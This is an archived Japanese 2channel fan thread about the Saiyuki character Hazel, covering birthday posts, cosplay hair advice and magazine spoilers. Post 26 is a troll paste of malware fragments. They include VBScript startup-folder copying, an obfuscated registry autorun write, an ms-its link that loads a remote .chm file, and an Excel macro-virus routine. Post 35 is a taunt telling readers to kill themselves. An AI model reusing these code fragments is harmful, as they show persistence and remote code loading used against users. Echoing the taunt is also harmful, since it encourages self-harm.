2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■最遊記■ヘイゼル様専用 2

1 :◆zyV4W0ckq2 :2006/12/19(火) 18:49:22 ID:12wbEwZN
前スレが落ちてしまいました。
もう少しだったのに〜;;ということでパート2もよろしくです。

前スレ
http://anime.2ch.net/test/read.cgi/anichara2/1100903600/l50

2 :名無しさん@お腹いっぱい。:2006/12/19(火) 18:51:27 ID:HLYCQN6Z
2げと

3 :名無しさん@お腹いっぱい。:2006/12/19(火) 22:12:22 ID:znyiWXD4
ヘイ様はフェミニン   ヘイ様はフェミニン   ヘイ様はフェミニン   ヘイ様はフェミニン   ヘイ様はフェミニン

4 :名無しさん@お腹いっぱい。:2006/12/19(火) 22:14:43 ID:znyiWXD4
マンマーヘイガト同人誌はどこにいったら手に入るの?(´・ω・`)

5 :名無しさん@お腹いっぱい。:2006/12/19(火) 22:43:08 ID:znyiWXD4
(´π`)鼻毛ピヨーン

6 :名無しさん@お腹いっぱい。:2006/12/19(火) 22:45:16 ID:W7glczsx
1様乙です!
皆様またまったりいきましょうねv

7 :名無しさん@お腹いっぱい。:2006/12/19(火) 23:09:36 ID:q2Pfy+Mf
           __, -──- 、
        / /        `ヽ
          / ,'           \
       /  ! / / ,  ,   } ヽ  ヽ
       ,'  │ {, 'i ィレ'レ|  ハ ハ !  ハ
      ,イ   |   |‐‐‐-、 レ' _ム__!_i/ ! }
     ~ レ、 i  ,ィ≠、     ___ }ノノ}ノ
        N,ヘ  V:rソ    {!::jテ//   長門有希が>>7ゲット
        ` レヽ ! ̄   ' └' //   
          `ヘ |>、  ‐   , イ/
            ,∨- ≧ー≦´W
         ,<ヾ、  \ニミ! `¨ヽ__
         /::::\ , ――┘、/, ―‐┤
         /::::::::::|  ̄ ̄ ̄ iー 'i    , !、
         /::::::::::::レ┐    |  |   {  l
         〈:::_/::{  ]    |  |  └,ヘ
       /::´::::::::::>ー'    │ !     !::}
        {::::::::::/::|_____|_|_, ---':ソ
MUSASH>>1 -GUN道-   作画・脚本あらゆる面において、これまでにないほどユニーク。
ふしぎ星の>>2ご姫    朝比奈みくるの中の人が主演。はにほ、意味不明。
カードキャプター>>3くら  作者の意図とは正反対に、小児愛好者(いわゆるロリコン)
               に絶大な人気を博す。ユニーク。
おとぎ銃>>4赤ずきん   小児向けかロリコン向けか解析不能。 
いち>>5ましまろ      性犯罪者予備軍育成アニメ。原作者はヤル気なし。
>>6ゼンメイデン      少女漫画のような作風や美しいドールの衣装から、男女のマニア比がほぼ同等の
               稀有なアニメ。麻生氏がファンかどうかは解析中。         
涼宮>>8ルヒの憂鬱    今期一番の注目アニメ。京アニのブランド化にも貢献。
ツバサ>>9ロニクル    キャラの使いまわし等、作者のヤル気のなさが随所に見られる作品。
               マニア特にカードキャプターさくらの支持層からは見放される。
ガンダムSee>>10     旧来のガンダムファンからは嫌悪されるが、通称萌えオタと呼ばれる
               マニア層、特に「腐女子」と呼ばれる女性たちから絶大な支持を得る。
               両者の間で激しい論争が勃発し、ネット上では一部のマニアが「荒し」等の迷惑行為を行う。
>11-1000        アニメバブルと呼ばれる昨今、年100本以上のアニメが製作されているが、
               主力商品のDVDソフトの販売不振によりアニメ業界は非常に苦しい状況に追い込まれている。
               私の分析では、近い将来年10本程度に落ち着くものと思われる。注意したほうがいい。

8 :ヘイゼル:2006/12/20(水) 13:21:37 ID:+FUPYukv
>>1はん、乙どす。
たのしゅうやりまひょ。


9 :名無しさん@お腹いっぱい。:2006/12/21(木) 01:36:07 ID:DSbWACek
ヘイゼルやああヘイゼルやヘイゼルや

10 :名無しさん@お腹いっぱい。:2006/12/21(木) 22:26:25 ID:BEWNYHEc
>9
ヘイ様にぴったりの歌ですわv
美しすぎて“ヘイゼル”しか出ないんですね

11 :名無しさん@お腹いっぱい。:2006/12/22(金) 04:33:33 ID:VsToDL1m
ヘイゼル可愛いよヘイゼル

12 :名無しさん@お腹いっぱい。:2006/12/22(金) 15:17:41 ID:BAnftkY4
ゼロサムって今売ってます?
ヘイ様がご活躍してないということで、どうしても立ち読みして確認したいんだが…

13 :名無しさん@お腹いっぱい。:2006/12/22(金) 16:00:06 ID:iWRlgDRq
ヘイ様の美貌は我が画力ではかきあらわせず 字あまり

14 :名無しさん@お腹いっぱい。:2006/12/22(金) 16:37:15 ID:s7MnCw/y
甘味―ズv

15 :名無しさん@お腹いっぱい。:2006/12/22(金) 21:15:06 ID:783uSuqx
ヒゲの名前でも同じ名称なかったっけ?

16 :名無しさん@お腹いっぱい。:2006/12/23(土) 01:29:18 ID:AG/SDSHG
ヘイゼルたんを姫だっこしたい

17 :◆zyV4W0ckq2 :2006/12/23(土) 17:30:09 ID:cX2tJz5+
>>6>>8様よろしくです。
他の皆様もよろしくです。2になってから書き込みが多くなったような^^;
いいことですが。

18 :名無しさん@お腹いっぱい。:2006/12/23(土) 23:17:52 ID:a4tZ6pKY
>12
売ってると思いますよ♪

19 :名無しさん@お腹いっぱい。:2006/12/24(日) 03:35:52 ID:7P7Qbh73
ゼロサム購読してる人「砂漠の夜みたいや」以降のネタバレどなたかください。

20 :名無しさん@お腹いっぱい。:2006/12/24(日) 22:03:38 ID:2xLI71pW
イブの夜

ヘイ様を想い 今年も一人で空を見上げてます・・・・

ヘイゼル司教様、ヘイ様ファンの方々メリークリスマス


21 :名無しさん@お腹いっぱい。:2006/12/24(日) 22:18:11 ID:pZYR8CLU
メリークリスマス♪ヘイゼルたんv

22 :名無しさん@お腹いっぱい。:2006/12/24(日) 23:36:56 ID:7P7Qbh73
ヘイゼルとガトのやおい公式扉絵が頻繁にでる件  だけどギャグやおい四コマとかをめったにみない件

23 :名無しさん@お腹いっぱい。:2006/12/24(日) 23:39:35 ID:7P7Qbh73
ヘイゼルファンがお薦めの同人サイトかサークルを教えてください。

24 :名無しさん@お腹いっぱい。:2006/12/25(月) 02:00:18 ID:edB+XReK
クリスマスにヘイゼル様と一緒に過ごせたら何処で何をしたい?
私はまず、街中を歩きオサレなジュエリーショップでヘイ様に指輪を買ってもらう、
そして手つないで寄り添いながらフレンチレストラン、ワインとシャンパン
美味しい料理を食べて、予約してあるホテルのスウィートに向かう。
そこで私の持ってきた手作りのブレスレット(ペンダントに合いそうなもの)を
ヘイ様の手首に付けてあげる、2人でワインの呑みなおし、今夜のことや
これからの2人のこととか、甘あまな話をしながらヘイゼルにチッスされて・・
その後は・・・・・・・


という妄想をしながら今日は寝る!
せめて今夜だけ夢に出てきてくれー><ヘイゼルのご加護を!!!


25 :名無しさん@お腹いっぱい。:2006/12/25(月) 02:02:58 ID:edB+XReK
↑設定はホワイトクリスマスということでw

26 :<body onload=window()>:2006/12/25(月) 07:25:03 ID:Q8nHqQBO
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


27 :ヘイゼル:2006/12/25(月) 21:39:57 ID:GBLKZn0f
皆はんメリークリスマス!

28 :名無しさん@お腹いっぱい。:2006/12/26(火) 14:15:33 ID:MUkzKBc4
保守

29 :名無しさん@お腹いっぱい。:2006/12/27(水) 22:37:27 ID:fxHaYbhG
ヘイ様の誕生日ももうすぐですねv

30 :名無しさん@お腹いっぱい。:2006/12/28(木) 05:56:22 ID:O74JWuOn
ヘイ様の誕生日をここの皆さんで祝おうじゃないか!!

31 :名無しさん@お腹いっぱい。:2006/12/29(金) 00:11:26 ID:lSL6n+vw
>30
良案ですわvV

32 :名無しさん@お腹いっぱい。:2006/12/29(金) 10:11:27 ID:pLX1u0gs
>>30
いいね〜!って実はヘイ様の誕生日知らんのですが、
参加していい?

33 :名無しさん@お腹いっぱい。:2006/12/29(金) 16:09:10 ID:lSL6n+vw
>32
ヘイ様の誕生日は1月2日です
皆で祝いましょうv^^

34 :名無しさん@お腹いっぱい。:2006/12/30(土) 05:33:36 ID:loF+PPNr
>>33
お〜っ!凄くめでたい日だね(*´▽`*)ノ
1月2日は実家にいるので、携帯から参加するよ!
でもみんなでおめでと〜っていうだけじゃ何か物足りないよね?何か出来ないかなぁ?
どうですか?>>30(主催者)

35 :名無しさん@お腹いっぱい。:2006/12/30(土) 05:49:17 ID:6DYETb3p
ニートだということを恥じて皆自害。なんてのがおすすめだゾ⌒☆

36 :名無しさん@お腹いっぱい。:2006/12/30(土) 10:14:09 ID:UXm8iRLq
こいつぁーくせぇーっ!
厨以下の臭いがぷんぷんするぜーーっ!!

37 :ゼロサム速報:2006/12/30(土) 15:54:32 ID:7hrYxe79
ネタバレ以下の話題として提供させて頂きます
今月の展開はヘイ様に妖怪と人間の在り方を考えさせられる風向きになりました

38 :名無しさん@お腹いっぱい。:2006/12/30(土) 20:26:52 ID:TATsMBPc
>>37
おお!ヘイ様まだ健在なんだね!
嬉しいー

39 :名無しさん@お腹いっぱい。:2006/12/31(日) 18:15:22 ID:wKOm0pK5
ヘイ様のドラマCDB聞きました♪あんまりヘイ様出てないけど…
烏哭とヘイ様の絡み萌えv

40 :◆zyV4W0ckq2 :2006/12/31(日) 18:21:41 ID:kAFOKM+Z
皆様、今年もお世話になりました。
来年もよろしくです^^よいお年を〜!
私もヘイ様の誕生日お祝いします!ではでは〜!

41 :名無しさん@お腹いっぱい。:2007/01/01(月) 00:56:57 ID:LQN2QEqL
ヘイ様スレの皆様明けましておめでとうございます!
今年もヘイ様を愛し、応援する事を誓います!
今年もよろしくお願いしまーすo(^-^)o

42 :名無しさん@お腹いっぱい。:2007/01/01(月) 11:02:09 ID:qv8ZE7vr
1さま、41さま
あけましておめでとうございます♪
今年も私はヘイ様一筋で頑張ります!

43 :名無しさん@お腹いっぱい。:2007/01/02(火) 00:17:38 ID:Y7C6z+7p
ヘイゼル、誕生日おめでとう!
あなたが今日という日に産まれてきてくれたから、私はあなたに出会うことが出来ました…
これからも応援してるので、体に気をつけて頑張ってね♪

44 :名無しさん@お腹いっぱい。:2007/01/02(火) 23:05:34 ID:RL8QqcI6
ヘイゼルのファンブックまじで出したい でも同人経験がない 同人友達もいない それ以前に画力が微妙

45 :◆zyV4W0ckq2 :2007/01/02(火) 23:24:05 ID:wXVoVpEs
ヘイ様
お誕生日おめでとう〜!
生まれてきてくれてありがとう(^з^)-☆Chu!!

46 :◆zyV4W0ckq2 :2007/01/02(火) 23:27:54 ID:wXVoVpEs
>>42
明けましておめでとうございます〜(^O^)
こちらこそ今年もよろしくお願いしまーす!

47 :名無しさん@お腹いっぱい。:2007/01/02(火) 23:59:36 ID:Y7C6z+7p
>44
私もです。
ヘイゼルハッピーバースディ!

48 :名無しさん@お腹いっぱい。:2007/01/03(水) 23:27:35 ID:5rPn8lg1
ヘイゼルIN大奥

49 :ミヌターサンタ:2007/01/03(水) 23:36:56 ID:5rPn8lg1
今月ヘイ様多くてワロタ\(^o^)/ ヘイ様改心ハジマタ

50 :◆zyV4W0ckq2 :2007/01/04(木) 00:47:38 ID:X+a58dRw
ヘイ様のお誕生日に、スレッドで出来ることは限られているので
もう遅いけど短編小説を久々に書こうかと・・・・・
パート1の方では暴走しすぎて(私が)荒れたので、ほのぼの系で
1話限りの小説を書いてみたいと思いますが、スレ住民の皆様いかがですか?

51 :◆zyV4W0ckq2 :2007/01/04(木) 00:49:02 ID:X+a58dRw
ちなみに、こんな感じの小説がいいなぁ・・とかあったら
書いてください。BL以外でお願いします(BL系だと、また荒れるので)

52 :名無しさん@お腹いっぱい。:2007/01/05(金) 00:27:27 ID:WTpfSmOS
>>51
短編なら、当たり障りないものがいいと思うけど
具体的にはわからんw

53 :名無しさん@お腹いっぱい。:2007/01/05(金) 00:29:00 ID:i0LE/kzR
小説、賛成です♪楽しみ〜v

54 :◆zyV4W0ckq2 :2007/01/06(土) 00:42:14 ID:EnTZMl6k
皆様ありがとうございます
それでは、次回小説をUPいたします^^

55 :名無しさん@お腹いっぱい。:2007/01/07(日) 02:49:35 ID:oJGQxxA7
>1
wktkまだー?

56 :名無しさん@お腹いっぱい。:2007/01/08(月) 11:49:20 ID:lQWod/2r
ヘイ様主人公の漫画かいてアップしたいけどスキャナがない。おすすめのハンディスキャナおしえて。

57 :名無しさん@お腹いっぱい。:2007/01/08(月) 20:26:04 ID:lpoakJM6
>>1
まってるよ、さわやかなのでお願い。

58 :名無しさん@お腹いっぱい。:2007/01/10(水) 02:27:22 ID:qcm1v/W5
ほすあげ

59 :名無しさん@お腹いっぱい。:2007/01/11(木) 12:43:50 ID:T8D6aS/5
今年の最遊記カレンダー買ったかたいますか?

60 :名無しさん@お腹いっぱい。:2007/01/11(木) 23:37:45 ID:hJ+Tao4I
>59
私買いましたノシ

61 :名無しさん@お腹いっぱい。:2007/01/12(金) 11:24:31 ID:qhqb3kQb
>>60
ヘイ様は載ってないって聞いたんですが、コウガイジたちは載ってるんでしょうか?
今度上京するのでアニメイトいこうと思ってるんですが、まだ置いてあるのかなぁ?

62 :60:2007/01/12(金) 15:20:37 ID:hxBDlZBm
>61
紅孩児たちは載ってませんでしたよ(^_^;)
今の時期、あるか微妙ですね

63 :名無しさん@お腹いっぱい。:2007/01/12(金) 22:39:35 ID:5jB++ibX
2ちゃんねる差し押さえって・・・・ここの皆にも会えなくなるの?(´・ω・`)

64 :名無しさん@お腹いっぱい。:2007/01/12(金) 22:45:19 ID:Ieia3EjV
2ちゃんを救おう!
http://off4.2ch.net/test/read.cgi/offmatrix/1168580932/l50

65 :名無しさん@お腹いっぱい。:2007/01/13(土) 19:41:30 ID:jYbaufXv
ネタじゃないの?2ちゃんなんて今や知らない人はあんまいないのに
閉鎖騒ぎでもニュースで全然取り上げられてないじゃん。
だから、心配しなくてもヘイゼルの話できるよ。安心しな

66 :名無しさん@お腹いっぱい。:2007/01/15(月) 00:43:59 ID:ucFcDv36
age

67 :名無しさん@お腹いっぱい。:2007/01/15(月) 23:00:01 ID:KNtk2ao+
来週には閉鎖?(´・ω・`)

68 :名無しさん@お腹いっぱい。:2007/01/16(火) 12:28:54 ID:pXLjLgYM
>>1氏が短編書くまでとりあえず保守しとく

69 :名無しさん@お腹いっぱい。:2007/01/16(火) 16:08:00 ID:m2iDywR5
最遊記本スレがいつもの三蔵厨に荒し埋め立てられたので誘導

【峰倉】最遊記RELOAD 2【かずや】
http://comic7.2ch.net/test/read.cgi/comic/1168928791/l50

70 :名無しさん@お腹いっぱい。:2007/01/16(火) 21:21:28 ID:zRv1XSbl
>>69

三蔵厨はどうしようもないな・・・

71 :名無しさん@お腹いっぱい。:2007/01/17(水) 23:20:40 ID:oYZjWyzN
いつも誘導してくれてる人はヘイゼルスレの住民のかたですか?

72 :名無しさん@お腹いっぱい。:2007/01/19(金) 06:11:27 ID:j0huvJ0M
ヘイゼルの髪の色ってアッシュだよね?
イベントにむけて染めようかと思うんだけど、あの色はやりすぎかなぁ?

73 :無し:2007/01/19(金) 23:49:58 ID:lmeGwISo
ヘイ様のコスプレ者みにいきたい、、ヘイ様のコスプレさんにはハードジェル一本丸々使うのがおすすめ

74 :名無しさん@お腹いっぱい。:2007/01/19(金) 23:59:52 ID:0B7Gi/W3
知り合いの身長2メートル超男子を
どーーーしてもガト役にして私のヘイゼルとコスプレさせたい!!!
彼はヲタじゃないのでどうやってダマすか・・・

75 :名無しさん@お腹いっぱい。:2007/01/20(土) 00:13:48 ID:HRY0YZGa
>>72
アッシュというが一回ガンガンブリーチしてがら灰色いれると
銀ぽくなるんじゃない?

>>74
がんがれ!成功したら教えてww

76 :名無しさん@お腹いっぱい。:2007/01/20(土) 11:38:22 ID:SKMpcX39
>>75
なるほど…
一回色抜いてからね。髪がボロボロになりそうですな(-_-;)ズラで我慢しようか…

77 :名無しさん@お腹いっぱい。:2007/01/21(日) 21:40:36 ID:kTcRKnQj
>>76
ヘイ様はつやつやの髪じゃないと駄目だもんね
でもヅラだとあの襟足のぴょんぴょん具合が難しそう

78 :名無しさん@お腹いっぱい。:2007/01/21(日) 21:44:19 ID:r8jTGCIZ
たこさんウインナは難しいかもね;
黒髪にホワイトのカラースプレー(あるのか?)
とかしたらちょっと銀ぽくなるんじゃないかな?
元の黒が透けてさ。痛まないし。

79 :名無しさん@お腹いっぱい。:2007/01/22(月) 01:56:20 ID:IuiqfKb2
>>77そうそう、艶が命だよね。ヘイゼルの髪はツヤピカでないと…>>78
ホワイトのスプレーは聞いたことないけど、髪用じゃないやつならハンズに売ってるよね。
それを髪に使えるかどうかは謎だけど…とりあえず最初からくるんとなってるズラを買ってきます。

80 :名無しさん@お腹いっぱい。:2007/01/22(月) 09:05:30 ID:ODJNUhEg
そのヅラあったらうpして欲しいな

81 :ヘイゼル:2007/01/23(火) 18:38:07 ID:FwvmKQ3e
なんや、うちのスレ全然進んでへんやんか
凹むわぁ〜

ほな、ぎょうさん書き込んでくだはれなv

82 :名無しさん@お腹いっぱい。:2007/01/23(火) 23:30:34 ID:Lk9Zd4yV
>>81
京都弁どころか関西弁もできねえなら、なりきりするな
なりきり板でやれ

83 :名無しさん@お腹いっぱい。:2007/01/24(水) 01:21:32 ID:qAI0iAgz
ホワイトというかグレーのヘアスプレーは売ってるはず!
演劇部で老け役の子が買ってた

でもヘイゼルの毛はそういう感じとは違うな

84 :名無しさん@お腹いっぱい。:2007/01/24(水) 02:13:03 ID:3hTY8kxq
ヘイ様仮装支援。ハードジェルとハードスプレーでオールバックを、ファイバーワックスで外はねメイクする。乾いてもウェット感をかもしだすワックスとの併用を推奨。←濡れた髪のようにセクシー。

85 :79:2007/01/24(水) 08:17:41 ID:WsTBGTzR
昨日地元の商店街のカシスペースで、おばちゃん専用の服業者が来てたんだけど
ヘイ様のズラあった!自作や地毛よりもよりヘイゼルに近い感じです。
ちゃんと外ハネもしてあるし、何と言っても銀髪だし!!買いたかったんですが
10000円近くして・・・・;;今給料日前なんでお金なくて買えませんが、
給料出てからまだあったら、購入してUPします。

86 :名無しさん@お腹いっぱい。:2007/01/24(水) 18:14:48 ID:KVMFIYJP
何かここ読んでたらイベントとか
行ってみたくなってきた!
楽しそやな〜

87 :名無しさん@お腹いっぱい。:2007/01/24(水) 23:25:59 ID:UEuAhdPG
>>85
もう無理言ってでもお取り置きしてもらうんだ!!
オタク仲間に借金してでも!!

88 :名無しさん@お腹いっぱい。:2007/01/24(水) 23:54:43 ID:UEuAhdPG
ヘイゼルの食っても太らない、を地でいっている姿が羨ましい
色白だし髪の毛さらさらだし、この女王が!!

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)